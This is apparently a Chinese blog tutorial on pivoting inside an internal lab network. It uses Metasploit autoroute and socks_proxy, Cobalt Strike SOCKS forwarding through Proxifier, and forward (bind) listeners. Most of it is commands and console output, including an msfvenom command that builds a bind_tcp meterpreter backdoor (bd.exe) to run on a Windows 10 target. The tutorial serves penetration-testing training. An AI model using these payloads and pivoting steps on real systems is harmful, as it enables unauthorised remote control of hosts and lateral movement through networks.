内网安全-代理技术-socket协议

小迪安全网络架构图:

背景:当前获取window7 出网主机的shell。

1.使用msf上线,查看路由

run autoroute -p

添加路由:

run post/multi/manage/autoroute

使用socks模块开启节点,作为流量跳板

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 1122

srvport => 1122

msf6 auxiliary(server/socks_proxy) > run

使用socket cap 进行代理

2.使用cs进行渗透测试

windwos7上线cs木马

点击代理转发选择socket

输入账户密码后,使用proifixer进行流量转发

配置为目标站点走socket5

3.使用cs进行windows10 上线cs

方案:创建木马将数据传递给本地4444端口

使用window7正向连接目标4444端口

cs配置正向监听器:

生成木马:

模拟执行木马,在windows7交互会话窗口:

connect 192.168.11.129 4444 即可上线

4.使用msf进行windows10 上线

生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe

放置windows10上运行

msf执行:

msf6 exploit(multi/handler) > use exploit/multi/handler

[*] Using configured payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf6 exploit(multi/handler) > set rhost 192.168.11.129

rhost => 192.168.11.129

msf6 exploit(multi/handler) > set lport 2222

lport => 2222

msf6 exploit(multi/handler) > run

相关推荐
vbsecvey13 分钟前
SWPU 2022 新生赛--web题
安全·web安全·网络安全
一夜白头催人泪6 小时前
安全扫描Django项目解决存在敏感信息常见问题
python·安全·django
计算机毕设定制辅导-无忧学长10 小时前
Nginx 安全配置与防护策略
运维·nginx·安全
不一样的信息安全21 小时前
7-Zip高危漏洞CVE-2025-0411:解析与修复
网络·安全·7-zip
棉花糖网络安全圈1 天前
7-Zip高危漏洞CVE-2025-0411 poc 攻击者可绕过安全机制远程执行代码
安全·7-zip
_Cooper_1 天前
MsfVenom木马制作及使用
安全·web安全·网络安全
web2u1 天前
Cloudflare通过代理服务器绕过 CORS 限制:原理、实现场景解析
javascript·安全·前端框架·node.js·代理模式·proxy模式
doubt。1 天前
【BUUCTF】October 2019 Twice SQL Injection1及知识点整理
网络·数据库·sql·mysql·安全·web安全·网络安全
然然阿然然1 天前
2025.1.21——六、BUU XSS COURSE 1 XSS漏洞|XSS平台搭建
前端·网络·安全·web安全·网络安全·xss
qlau20071 天前
基于AnolisOS 8.6安装GmSSL 3.1.1及easy_gmssl库测试国密算法
python·安全